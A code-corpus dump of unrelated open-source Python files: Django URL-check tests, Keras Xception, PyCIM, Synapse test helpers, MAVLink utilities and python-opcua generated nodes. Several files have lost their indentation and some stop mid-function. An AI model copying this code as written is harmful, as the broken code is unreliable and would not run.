tests/check_framework/test_urls.py
|
Python
|
bsd-3-clause
| 1,638
| 0.001832
|
from django.core.checks.urls import check_url_config
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckUrlsTest(SimpleTestCase):
@override_settings(ROOT_URLCONF='check_framework.urls_no_warnings')
def test_include_no_warnings(self):
result = check_url_config(None)
self.assertEqual(result, [])
@override_settings(ROOT_URLCONF='check_framework.urls_include')
def test_include_with_dollar(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W001')
expected_msg = "Your URL pattern '^include-with-dollar$' uses include with a regex ending with a '$'."
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_slash')
def test_url_beginning_with_slash(self):
        result = check_url_config(None)
        self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W002')
expected_msg = "Your URL pattern '/starting-with-slash/$' has a regex beginning with a '/'"
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_name')
def test_url_pattern_name_with_colon(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W003')
expected_msg = "Your URL pattern '^$' [name='name_with:colon'] has a name including a ':'."
self.assertIn(expected_msg, warning.msg)
|
mdpiper/csdms-wiki-api-examples
|
ask_api_examples/list_model_repo_doi.py
|
Python
|
mit
| 327
| 0
|
"""Find all models written by user Hutton, including the DOI and the
source code repository for each model.
"""
from ask_api_examples import make_query
query = '[[Last name::Hutton]]|?DOI model|?Source web address'
def main():
    r = make_query(query, __file__)
return r
if __name__ == '__main__':
print main()
|
bbenligiray/keras_models
|
not_used/xception.py
|
Python
|
mit
| 11,593
| 0.002156
|
# -*- coding: utf-8 -*-
"""Xception V1 model for Keras.
On ImageNet, this model gets to a top-1 validation accuracy of 0.790
and a top-5 validation accuracy of 0.945.
Do note that the input image format for this model is different than for
the VGG16 and ResNet models (299x299 instead of 224x224),
and that the input preprocessing function
is also different (same as Inception V3).
Also do note that this model is only available for the TensorFlow backend,
due to its reliance on `SeparableConvolution` layers.
# Reference
- [Xception: Deep Learning with Depthwise Separable Convolutions](https://arxiv.org/abs/1610.02357)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from ..models import Model
from .. import layers
from ..layers import Dense
from ..layers import Input
from ..layers import BatchNormalization
from ..layers import Activation
from ..layers import Conv2D
from ..layers import SeparableConv2D
from ..layers import MaxPooling2D
from ..layers import GlobalAveragePooling2D
from ..layers import GlobalMaxPooling2D
from ..engine.topology import get_source_inputs
from ..utils.data_utils import get_file
from .. import backend as K
from .imagenet_utils import decode_predictions
from .imagenet_utils import _obtain_input_shape
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.4/xception_weights_tf_dim_ordering_tf_kernels_notop.h5'
def Xception(include_top=True, weights='imagenet',
input_tensor=None, input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Xception architecture.
Optionally loads weights pre-trained
on ImageNet. This model is available for TensorFlow only,
and can only be used with inputs following the TensorFlow
data format `(width, height, channels)`.
You should set `image_data_format="channels_last"` in your Keras config
located at ~/.keras/keras.json.
Note that the default input image size for this model is 299x299.
# Arguments
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
            has to be `(299, 299, 3)`).
            It should have exactly 3 input channels,
and width and height should be no smaller than 71.
E.g. `(150, 150, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
RuntimeError: If attempting to run this model with a
backend that does not support separable convolutions.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
if K.backend() != 'tensorflow':
raise RuntimeError('The Xception model is only available with '
'the TensorFlow backend.')
if K.image_data_format() != 'channels_last':
warnings.warn('The Xception model is only available for the '
'input data format "channels_last" '
'(width, height, channels). '
'However your settings specify the default '
'data format "channels_first" (channels, width, height). '
'You should set `image_data_format="channels_last"` in your Keras '
'config located at ~/.keras/keras.json. '
'The model being returned right now will expect inputs '
'to follow the "channels_last" data format.')
K.set_image_data_format('channels_last')
old_data_format = 'channels_first'
else:
old_data_format = None
# Determine proper input shape
input_shape = _obtain_input_shape(input_shape,
default_size=299,
min_size=71,
data_format=K.image_data_format(),
include_top=include_top)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
x = Conv2D(32, (3, 3), strides=(2, 2), use_bias=False, name='block1_conv1')(img_input)
x = BatchNormalization(name='block1_conv1_bn')(x)
x = Activation('relu', name='block1_conv1_act')(x)
x = Conv2D(64, (3, 3), use_bias=False, name='block1_conv2')(x)
x = BatchNormalization(name='block1_conv2_bn')(x)
x = Activation('relu', name='block1_conv2_act')(x)
residual = Conv2D(128, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv1')(x)
x = BatchNormalization(name='block2_sepconv1_bn')(x)
x = Activation('relu', name='block2_sepconv2_act')(x)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv2')(x)
x = BatchNormalization(name='block2_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block2_pool')(x)
x = layers.add([x, residual])
    residual = Conv2D(256, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block3_sepconv1_act')(x)
    x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv1')(x)
x = BatchNormalization(name='block3_sepconv1_bn')(x)
x = Activation('relu', name='block3_sepconv2_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv2')(x)
x = BatchNormalization(name='block3_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block3_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block4_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv1')(x)
x = BatchNormalization(name='block4_sepconv1_bn')(x)
x = Activation('relu', name='block4_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv2')(x)
x = BatchNo
|
idea4bsd/idea4bsd
|
python/testData/copyPaste/Whitespace.after.py
|
Python
|
apache-2.0
| 59
| 0.016949
|
def f():
try:
a = 1
except:
b = 1
| |
rwl/PyCIM
|
CIM14/IEC61968/PaymentMetering/LineDetail.py
|
Python
|
mit
| 2,482
| 0.004432
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.Element import Element
class LineDetail(Element):
"""Details on an amount line, with rounding, date and note.
"""
def __init__(self, dateTime='', rounding=0.0, note='', amount=0.0, *args, **kw_args):
"""Initialises a new 'LineDetail' instance.
@param dateTime: Date and time when this line was created in the application process.
@param rounding: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
@param note: Free format note relevant to this line.
@param amount: Amount for this line item.
"""
#: Date and time when this line was created in the application process.
self.dateTime = dateTime
#: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
self.rounding = rounding
#: Free format note relevant to this line.
self.note = note
#: Amount for this line item.
self.amount = amount
super(LineDetail, self).__init__(*args, **kw_args)
_attrs = ["dateTime", "rounding", "note", "amount"]
_attr_types = {"dateTime": str, "rounding": float, "note": str, "amount": float}
_defaults = {"dateTime": '', "rounding": 0.0, "note": '', "amount": 0.0}
_enums = {}
_refs = []
_many_refs = []
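# Instantiation sketch (illustrative values only):
#
#   line = LineDetail(dateTime='2011-05-01T12:00:00', rounding=0.01,
#                     note='free format note', amount=42.5)
#   line.amount   # -> 42.5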
|
apavlo/h-store
|
src/catgen/catalog_utils/testdata.py
|
Python
|
gpl-3.0
| 1,429
| 0.004899
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2010 VoltDB Inc.
#
# VoltDB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# VoltDB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
testspec = """
class Database {
/** test comment */
// more comments
Partition* partitions; // more comments
Table* tables;
Program* programs;
Procedure* procedures;
}
/*
class Garbage {
Garbage garbage;
}
*/
class Partition {
bool isActive;
Range* ranges;
Replica* replicas;
}
class Table {
int type;
Table? buddy1;
Table? buddy2;
Column* columns;
Index* indexes;
Constraint* constraints;
}
class Program {
Program* programs;
Procedure* procedures;
Table* tables;
}
"""
def checkeq( a, b ):
if a != b:
raise Exception( 'test failed: %r != %r' % (a,b) )
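# Example (illustrative): checkeq(2 + 2, 4) passes silently, while
# checkeq(2 + 2, 5) raises "test failed: 4 != 5".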
|
rzr/synapse
|
tests/rest/client/v1/utils.py
|
Python
|
apache-2.0
| 4,828
| 0.000829
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests import unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
"""Contains extra helper functions to quickly and clearly perform a given
REST action, which isn't the focus of the test.
This subclass assumes there are mock_resource and auth_user_id attributes.
"""
def __init__(self, *args, **kwargs):
super(RestTestCase, self).__init__(*args, **kwargs)
self.mock_resource = None
self.auth_user_id = None
def mock_get_user_by_token(self, token=None):
return self.auth_user_id
@defer.inlineCallbacks
def create_room_as(self, room_creator, is_public=True, tok=None):
temp_id = self.auth_user_id
self.auth_user_id = room_creator
path = "/createRoom"
content = "{}"
if not is_public:
content = '{"visibility":"private"}'
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("POST", path, content)
self.assertEquals(200, code, msg=str(response))
self.auth_user_id = temp_id
defer.returnValue(response["room_id"])
@defer.inlineCallbacks
def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
membership=Membership.INVITE,
expect_code=expect_code)
@defer.inlineCallbacks
def join(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.JOIN,
expect_code=expect_code)
@defer.inlineCallbacks
def leave(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.LEAVE,
expect_code=expect_code)
@defer.inlineCallbacks
def change_membership(self, room, src, targ, membership, tok=None,
expect_code=200):
temp_id = self.auth_user_id
self.auth_user_id = src
path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
if tok:
path = path + "?access_token=%s" % tok
data = {
"membership": membership
}
(code, response) = yield self.mock_resource.trigger("PUT", path,
json.dumps(data))
self.assertEquals(expect_code, code, msg=str(response))
self.auth_user_id = temp_id
@defer.inlineCallbacks
def register(self, user_id):
(code, response) = yield self.mock_resource.trigger(
"POST",
"/register",
json.dumps({
"user": user_id,
"password": "test",
"type": "m.login.password"
}))
self.assertEquals(200, code)
defer.returnValue(response)
@defer.inlineCallbacks
def send(self, room_id, body=None, txn_id=None, tok=None,
expect_code=200):
if txn_id is None:
txn_id = "m%s" % (str(time.time()))
if body is None:
body = "body_text_here"
path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
content = '{"msgtype":"m.text","body":"%s"}' % body
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("PUT", path, content)
self.assertEquals(expect_code, code, msg=str(response))
def assert_dict(self, required, actual):
"""Does a partial assert of a dict.
Args:
required (dict): The keys and value which MUST be in 'actual'.
actual (dict): The test result. Extra keys will not be checked.
"""
for key in required:
self.assertEquals(required[key], actual[key],
msg="%s mismatch. %s" % (key, actual))
|
cea-ufmg/pyfdas
|
pyfdas/mavlog.py
|
Python
|
mit
| 891
| 0.001122
|
"""Log MAVLink stream."""
import argparse
from pymavlink import mavutil
import pymavlink.dialects.v10.ceaufmg as mavlink
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--verbose", action='store_true',
help="print messages to STDOUT")
parser.add_argument("--device", required=True, help="serial port")
parser.add_argument("--log", type=argparse.FileType('w'),
help="Log file")
parser.add_argument("--baudrate", type=int, help="serial port baud rate",
default=57600)
args = parser.parse_args()
conn = mavutil.mavlink_connection(args.device, baud=args.baudrate)
conn.logfile = args.log
while True:
msg = conn.recv_msg()
        if args.verbose and msg is not None:
print(msg)
if __name__ == '__main__':
main()
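# Example invocation (illustrative; the device path and file names are placeholders):
#
#   $ python mavlog.py --device /dev/ttyUSB0 --baudrate 57600 --log flight.tlog --verbose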
|
trunetcopter/trunetcopter
|
gui/pymavlink/mavextra.py
|
Python
|
gpl-3.0
| 16,655
| 0.005344
|
#!/usr/bin/env python
'''
useful extra functions for use by mavlink clients
Copyright Andrew Tridgell 2011
Released under GNU GPL version 3 or later
'''
import os, sys
from math import *
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), 'examples'))
try:
# rotmat doesn't work on Python3.2 yet
from rotmat import Vector3, Matrix3
except Exception:
pass
def kmh(mps):
'''convert m/s to Km/h'''
return mps*3.6
def altitude(SCALED_PRESSURE, ground_pressure=None, ground_temp=None):
'''calculate barometric altitude'''
import mavutil
self = mavutil.mavfile_global
if ground_pressure is None:
if self.param('GND_ABS_PRESS', None) is None:
return 0
ground_pressure = self.param('GND_ABS_PRESS', 1)
if ground_temp is None:
ground_temp = self.param('GND_TEMP', 0)
scaling = ground_pressure / (SCALED_PRESSURE.press_abs*100.0)
temp = ground_temp + 273.15
return log(scaling) * temp * 29271.267 * 0.001
def mag_heading(RAW_IMU, ATTITUDE, declination=None, SENSOR_OFFSETS=None, ofs=None):
'''calculate heading from raw magnetometer'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
headX = mag_x*cos(ATTITUDE.pitch) + mag_y*sin(ATTITUDE.roll)*sin(ATTITUDE.pitch) + mag_z*cos(ATTITUDE.roll)*sin(ATTITUDE.pitch)
headY = mag_y*cos(ATTITUDE.roll) - mag_z*sin(ATTITUDE.roll)
heading = degrees(atan2(-headY,headX)) + declination
if heading < 0:
heading += 360
return heading
def mag_field(RAW_IMU, SENSOR_OFFSETS=None, ofs=None):
'''calculate magnetic field strength from raw magnetometer'''
mag_x = RAW_IMU.xmag
mag_y = RAW_IMU.ymag
mag_z = RAW_IMU.zmag
if SENSOR_OFFSETS is not None and ofs is not None:
mag_x += ofs[0] - SENSOR_OFFSETS.mag_ofs_x
mag_y += ofs[1] - SENSOR_OFFSETS.mag_ofs_y
mag_z += ofs[2] - SENSOR_OFFSETS.mag_ofs_z
return sqrt(mag_x**2 + mag_y**2 + mag_z**2)
def angle_diff(angle1, angle2):
'''show the difference between two angles in degrees'''
ret = angle1 - angle2
if ret > 180:
ret -= 360;
if ret < -180:
ret += 360
return ret
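# e.g. angle_diff(350, 10) -> -20 and angle_diff(10, 350) -> 20; the result is
# always wrapped into the range [-180, 180].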
average_data = {}
def average(var, key, N):
'''average over N points'''
global average_data
if not key in average_data:
average_data[key] = [var]*N
return var
average_data[key].pop(0)
average_data[key].append(var)
return sum(average_data[key])/N
derivative_data = {}
def second_derivative_5(var, key):
'''5 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*5)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
ret = ((data[4] + data[0]) - 2*data[2]) / (4*h**2)
return ret
def second_derivative_9(var, key):
'''9 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*9)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
    # N=9 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
f = data
ret = ((f[8] + f[0]) + 4*(f[7] + f[1]) + 4*(f[6]+f[2]) - 4*(f[5]+f[3]) - 10*f[4])/(64*h**2)
return ret
lowpass_data = {}
def lowpass(var, key, factor):
'''a simple lowpass filter'''
global lowpass_data
if not key in lowpass_data:
lowpass_data[key] = var
else:
lowpass_data[key] = factor*lowpass_data[key] + (1.0 - factor)*var
return lowpass_data[key]
last_diff = {}
def diff(var, key):
    '''calculate differences between values'''
global last_diff
ret = 0
if not key in last_diff:
last_diff[key] = var
return 0
ret = var - last_diff[key]
last_diff[key] = var
return ret
last_delta = {}
def delta(var, key, tusec=None):
'''calculate slope'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
ret = (var - last_v) / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def delta_angle(var, key, tusec=None):
'''calculate slope of an angle'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
dv = var - last_v
if dv > 180:
dv -= 360
if dv < -180:
dv += 360
ret = dv / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def roll_estimate(RAW_IMU,GPS_RAW_INT=None,ATTITUDE=None,SENSOR_OFFSETS=None, ofs=None, mul=None,smooth=0.7):
'''estimate roll from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(-asin(ry/sqrt(rx**2+ry**2+rz**2))),'_roll',smooth)
def pitch_estimate(RAW_IMU, GPS_RAW_INT=None,ATTITUDE=None, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
'''estimate pitch from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(asin(rx/sqrt(rx**2+ry**2+rz**2))),'_pitch',smooth)
def rotation(ATTITUDE):
'''return the current DCM rotation matrix'''
r = Matrix3()
r.from_euler(ATTITUDE.roll, ATTITUDE.pitch, ATTITUDE.yaw)
return r
def mag_rotation(RAW_IMU, inclination, declination):
'''return an attitude rotation matrix that is consistent with the current mag
vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
m_earth = Vector3(m_body.length(), 0, 0)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth
|
iirob/python-opcua
|
opcua/server/standard_address_space/standard_address_space_part11.py
|
Python
|
lgpl-3.0
| 125,106
| 0.000767
|
# -*- coding: utf-8 -*-
"""
DO NOT EDIT THIS FILE!
It is automatically generated from opcfoundation.org schemas.
"""
from opcua import ua
from opcua.ua import NodeId, QualifiedName, NumericNodeId, StringNodeId, GuidNodeId
from opcua.ua import NodeClass, LocalizedText
def create_standard_address_space_Part11(server):
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(56, 0)
node.BrowseName = QualifiedName('HasHistoricalConfiguration', 0)
node.NodeClass = NodeClass.ReferenceType
node.ParentNodeId = NumericNodeId(44, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ReferenceTypeAttributes()
attrs.Description = LocalizedText("The type for a reference to the historical configuration for a data variable.")
attrs.DisplayName = LocalizedText("HasHistoricalConfiguration")
attrs.InverseName = LocalizedText("HistoricalConfigurationOf")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(56, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(44, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11192, 0)
node.BrowseName = QualifiedName('HistoryServerCapabilities', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(2268, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(2330, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("HistoryServerCapabilities")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11193, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11242, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11273, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11274, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11196, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11197, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11198, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11199, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11200, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11281, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11282, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11283, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11502, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11275, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11201, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2268, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11192, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
    server.add_references(refs)
node = ua.AddNodesItem()
